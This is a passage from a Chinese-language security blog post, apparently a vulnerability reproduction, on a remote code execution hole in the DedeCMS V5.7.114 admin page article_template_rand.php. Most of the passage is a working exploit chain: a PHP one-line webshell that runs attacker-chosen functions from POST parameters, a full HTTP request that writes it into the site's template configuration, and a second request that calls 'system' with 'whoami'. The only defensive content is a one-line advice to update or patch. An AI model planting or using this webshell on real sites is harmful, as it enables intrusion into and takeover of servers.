<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs PHP"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">//这个值为 0 表示关闭此设置， 为 1 表示开启</span><br><span class="hljs-variable">$cfg_tamplate_rand</span> = <span class="hljs-number">0</span>;<br><br><span class="hljs-comment">//模板数组，如果需要增加，按这个格式增加或修改即可(必须确保这些模板是存在的)，并且数量必须为2个或以上。</span><br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article.htm&#x27;</span>;<br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article1.htm&#x27;</span>;<br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article2.htm&#x27;</span>;<br><span class="hljs-variable">$a</span> = <span class="hljs-string">&#x27;_POST&#x27;</span>;<br><span class="hljs-variable">$$a</span>[<span class="hljs-number">1</span>](<span class="hljs-variable">$$a</span>[<span class="hljs-number">0</span>]);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730142630401.png" srcset="/img/loading.gif" lazyload alt="image-20240730142630401"></p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730144142133.png" srcset="/img/loading.gif" lazyload alt="image-20240730144142133"></p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730144424207.png" srcset="/img/loading.gif" lazyload alt="image-20240730144424207"></p>
<p>尝试访问呢</p>
<p><img src="https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/image-20240730154437336.png" srcset="/img/loading.gif" lazyload alt="image-20240730154437336"></p>
<p>漏洞利用poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-comment">//这个值为 0 表示关闭此设置， 为 1 表示开启</span><br><span class="hljs-variable">$cfg_tamplate_rand</span> = <span class="hljs-number">0</span>;<br><br><span class="hljs-comment">//模板数组，如果需要增加，按这个格式增加或修改即可(必须确保这些模板是存在的)，并且数量必须为2个或以上。</span><br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article.htm&#x27;</span>;<br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article1.htm&#x27;</span>;<br><span class="hljs-variable">$cfg_tamplate_arr</span>[] = <span class="hljs-string">&#x27;article_article2.htm&#x27;</span>;<br><span class="hljs-variable">$a</span> = <span class="hljs-string">&#x27;_POST&#x27;</span>;<br><span class="hljs-variable">$$a</span>[<span class="hljs-number">1</span>](<span class="hljs-variable">$$a</span>[<span class="hljs-number">0</span>]);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>创建文件的数据包，但是织梦有csrf_token 可能只有手动创建</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/dede/article_template_rand.php</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>zm57114rce.com<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>1111<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>max-age=0<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Origin</span><span class="hljs-punctuation">: </span>http://zm57114rce.com<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>http://zm57114rce.com/dede/article_template_rand.php<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate, br<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.9<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>menuitems=1_1%2C2_1%2C3_1; PHPSESSID=d2pdtr8qigb9g5da1cbkk545l3; _csrf_name_558973f2=0a88d85a34e426384872a4dc7d5a9268; _csrf_name_558973f21BH21ANI1AGD297L1FF21LN02BGE1DNG=bf1aa4ff89999395; XDEBUG_SESSION=XDEBUG_ECLIPSE; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=d2dc7998910eaa14; DedeLoginTime=1722327120; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=19c3000ae5121fd8<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><br><span class="language-llvm">dopost<span class="hljs-operator">=</span>save&amp;token<span class="hljs-operator">=</span><span class="hljs-number">57</span>d<span class="hljs-number">55</span><span class="hljs-keyword">c</span><span class="hljs-number">16e56</span>ddb<span class="hljs-number">37</span>ec<span class="hljs-number">905</span>ca<span class="hljs-number">753021499</span>&amp;templates<span class="hljs-operator">=</span><span class="hljs-variable">%3</span>C<span class="hljs-variable">%3</span>Fphp<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%2</span>F<span class="hljs-variable">%2</span>F<span class="hljs-variable">%E8</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%99</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%AA</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%80</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%BA</span><span class="hljs-variable">%2</span>B<span class="hljs-number">0</span><span class="hljs-variable">%2</span>B<span class="hljs-variable">%E8</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%A8</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%A4</span><span class="hljs-variable">%BA</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%85</span><span class="hljs-variable">%B3</span><span class="hljs-variable">%E9</span><span class="hljs-variable">%97</span><span class="hljs-variable">%AD</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%AD</span><span class="hljs-variable">%A4</span><span class="hljs-variable">%E8</span><span class="hljs-variable">%AE</span><span class="hljs-variable">%BE</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%BD</span><span class="hljs-variable">%AE</span><span class="hljs-variable">%EF</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%2</span>B<span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%BA</span><span class="hljs-variable">%2</span>B<span class="hljs-number">1</span><span class="hljs-variable">%2</span>B<span class="hljs-variable">%E8</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%A8</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%A4</span><span class="hljs-variable">%BA</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%80</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%90</span><span class="hljs-variable">%AF</span><span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>cfg_tamplate_rand<span class="hljs-variable">%3</span>D<span class="hljs-number">0</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%2</span>F<span class="hljs-variable">%2</span>F<span class="hljs-variable">%E6</span><span class="hljs-variable">%A8</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%9</span>D<span class="hljs-variable">%BF</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%95</span><span class="hljs-variable">%B0</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%BB</span><span class="hljs-variable">%84</span><span class="hljs-variable">%EF</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%E5</span><span class="hljs-variable">%A6</span><span class="hljs-variable">%82</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%9</span>C<span class="hljs-variable">%E9</span><span class="hljs-variable">%9</span>C<span class="hljs-variable">%80</span><span class="hljs-variable">%E8</span><span class="hljs-variable">%A6</span><span class="hljs-variable">%81</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%A2</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%E5</span><span class="hljs-variable">%8</span>A<span class="hljs-variable">%A0</span><span class="hljs-variable">%EF</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%E6</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%89</span><span class="hljs-variable">%E8</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%99</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%AA</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%A0</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%8</span>F<span class="hljs-variable">%E5</span><span class="hljs-variable">%A2</span><span class="hljs-variable">%9</span>E<span class="hljs-variable">%E5</span><span class="hljs-variable">%8</span>A<span class="hljs-variable">%A0</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%88</span><span class="hljs-variable">%96</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%AE</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%94</span><span class="hljs-variable">%B9</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%8</span>D<span class="hljs-variable">%B3</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%8</span>F<span class="hljs-variable">%AF</span><span class="hljs-variable">%28</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%85</span><span class="hljs-variable">%E9</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%BB</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%AE</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%9</span>D<span class="hljs-variable">%E8</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%99</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%BA</span><span class="hljs-variable">%9</span>B<span class="hljs-variable">%E6</span><span class="hljs-variable">%A8</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%9</span>D<span class="hljs-variable">%BF</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%98</span><span class="hljs-variable">%AF</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%AD</span><span class="hljs-variable">%98</span><span class="hljs-variable">%E5</span><span class="hljs-variable">%9</span>C<span class="hljs-variable">%A8</span><span class="hljs-variable">%E7</span><span class="hljs-variable">%9</span>A<span class="hljs-variable">%84</span><span class="hljs-variable">%29</span><span class="hljs-variable">%EF</span><span class="hljs-variable">%BC</span><span class="hljs-variable">%8</span>C<span class="hljs-variable">%E5</span><span class="hljs-variable">%B9</span><span class="hljs-variable">%B6</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%94</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%95</span><span class="hljs-variable">%B0</span><span class="hljs-variable">%E9</span><span class="hljs-variable">%87</span><span class="hljs-variable">%8</span>F<span class="hljs-variable">%E5</span><span class="hljs-variable">%BF</span><span class="hljs-variable">%85</span><span class="hljs-variable">%E9</span><span class="hljs-variable">%A1</span><span class="hljs-variable">%BB</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%BA2</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%AA</span><span class="hljs-variable">%E6</span><span class="hljs-variable">%88</span><span class="hljs-variable">%96</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%BB</span><span class="hljs-variable">%A5</span><span class="hljs-variable">%E4</span><span class="hljs-variable">%B8</span><span class="hljs-variable">%8</span>A<span class="hljs-variable">%E3</span><span class="hljs-variable">%80</span><span class="hljs-variable">%82</span><span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>cfg_tamplate_arr<span class="hljs-variable">%5</span>B<span class="hljs-variable">%5</span>D<span class="hljs-variable">%3</span>D<span class="hljs-variable">%27</span>article_article.htm<span class="hljs-variable">%27</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>cfg_tamplate_arr<span class="hljs-variable">%5</span>B<span class="hljs-variable">%5</span>D<span class="hljs-variable">%3</span>D<span class="hljs-variable">%27</span>article_article<span class="hljs-number">1</span>.htm<span class="hljs-variable">%27</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>cfg_tamplate_arr<span class="hljs-variable">%5</span>B<span class="hljs-variable">%5</span>D<span class="hljs-variable">%3</span>D<span class="hljs-variable">%27</span>article_article<span class="hljs-number">2</span>.htm<span class="hljs-variable">%27</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>a<span class="hljs-variable">%3</span>D<span class="hljs-variable">%22</span>_POST<span class="hljs-variable">%22</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>b<span class="hljs-variable">%3</span>D<span class="hljs-variable">%27</span><span class="hljs-variable">%24</span><span class="hljs-variable">%27</span>.<span class="hljs-variable">%24</span>a<span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%24</span>_POST<span class="hljs-variable">%5</span>B<span class="hljs-number">1</span><span class="hljs-variable">%5</span>D<span class="hljs-variable">%28</span><span class="hljs-variable">%24</span>_POST<span class="hljs-variable">%5</span>B<span class="hljs-number">0</span><span class="hljs-variable">%5</span>D<span class="hljs-variable">%29</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%3</span>F<span class="hljs-variable">%3</span>E<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A<span class="hljs-variable">%0</span>D<span class="hljs-variable">%0</span>A&amp;imageField<span class="hljs-number">1</span>.<span class="hljs-keyword">x</span><span class="hljs-operator">=</span><span class="hljs-number">14</span>&amp;imageField<span class="hljs-number">1</span>.y<span class="hljs-operator">=</span><span class="hljs-number">15</span></span><br></code></pre></td></tr></table></figure>

<p>命令执行数据包</p>
<figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs http"><span class="hljs-keyword">POST</span> <span class="hljs-string">/data/template.rand.php</span> <span class="hljs-meta">HTTP/1.1</span><br><span class="hljs-attribute">Host</span><span class="hljs-punctuation">: </span>zm57114rce.com<br><span class="hljs-attribute">Content-Length</span><span class="hljs-punctuation">: </span>17s<br><span class="hljs-attribute">Cache-Control</span><span class="hljs-punctuation">: </span>max-age=0<br><span class="hljs-attribute">Upgrade-Insecure-Requests</span><span class="hljs-punctuation">: </span>1<br><span class="hljs-attribute">Origin</span><span class="hljs-punctuation">: </span>http://zm57114rce.com<br><span class="hljs-attribute">Content-Type</span><span class="hljs-punctuation">: </span>application/x-www-form-urlencoded<br><span class="hljs-attribute">User-Agent</span><span class="hljs-punctuation">: </span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36<br><span class="hljs-attribute">Accept</span><span class="hljs-punctuation">: </span>text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br><span class="hljs-attribute">Referer</span><span class="hljs-punctuation">: </span>http://zm57114rce.com/data/template.rand.php<br><span class="hljs-attribute">Accept-Encoding</span><span class="hljs-punctuation">: </span>gzip, deflate, br<br><span class="hljs-attribute">Accept-Language</span><span class="hljs-punctuation">: </span>zh-CN,zh;q=0.9<br><span class="hljs-attribute">Cookie</span><span class="hljs-punctuation">: </span>PHPSESSID=d2pdtr8qigb9g5da1cbkk545l3; _csrf_name_558973f2=0a88d85a34e426384872a4dc7d5a9268; _csrf_name_558973f21BH21ANI1AGD297L1FF21LN02BGE1DNG=bf1aa4ff89999395<br><span class="hljs-attribute">Connection</span><span class="hljs-punctuation">: </span>close<br><br><span class="language-ini"><span class="hljs-attr">1</span>=system&amp;<span class="hljs-number">0</span>=whoami</span><br></code></pre></td></tr></table></figure>





<h2 id="0x06-修复建议"><a href="#0x06-修复建议" class="headerlink" title="0x06 修复建议"></a>0x06 修复建议</h2><p>更新版本或者打补丁</p>
<h2 id="0x07-参考文章"><a href="#0x07-参考文章" class="headerlink" title="0x07 参考文章"></a>0x07 参考文章</h2><p>[dedeCMS V5.7.114 article_template_rand.php code injection.md · 狗and猫&#x2F;cve - Gitee.com](<a target="_blank" rel="noopener" href="https://gitee.com/fushuling/cve/blob/master/dedeCMS">https://gitee.com/fushuling/cve/blob/master/dedeCMS</a> V5.7.114 article_template_rand.php code injection.md)md)</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">#漏洞复现</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>DedeCMSV5.7.114后台article_template_rand.php存在rce漏洞</div>
      <div>https://tsy244.github.io/2024/07/30/漏洞复现/DedeCMSV5-7-114后台article-template-rand-php存在rce漏洞/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>August Rosenberg</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>July 30, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2024/07/31/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/1Panel%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AE%A1%E7%90%86%E6%8E%A7%E5%88%B6%E9%9D%A2%E6%9D%BFSQL%E6%B3%A8%E5%85%A5CVE-2024-39907/" title="1Panel服务器管理控制面板SQL注入CVE-2024-39907">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">1Panel服务器管理控制面板SQL注入CVE-2024-39907</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2024/07/23/%E6%B8%97%E9%80%8F/%E8%8B%A5%E4%BE%9D%E7%AB%99%E7%82%B9%E6%B8%97%E9%80%8F%E6%80%9D%E8%B7%AF/" title="若依站点渗透思路">
                        <span class="hidden-mobile">若依站点渗透思路</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://github.com/TSY244?tab=repositories" target="_blank" rel="nofollow noopener"><span>github</span></a> <i class="iconfont icon-love"></i> <a href="https://august244.github.io/" target="_blank" rel="nofollow noopener"><span>随笔</span></a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        Views: 
        <span id="busuanzi_value_site_pv"></span>
        
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        Visitors: 
        <span id="busuanzi_value_site_uv"></span>
        
      </span>
    
    
  
</div>

  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.0/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.18.2/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>

  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
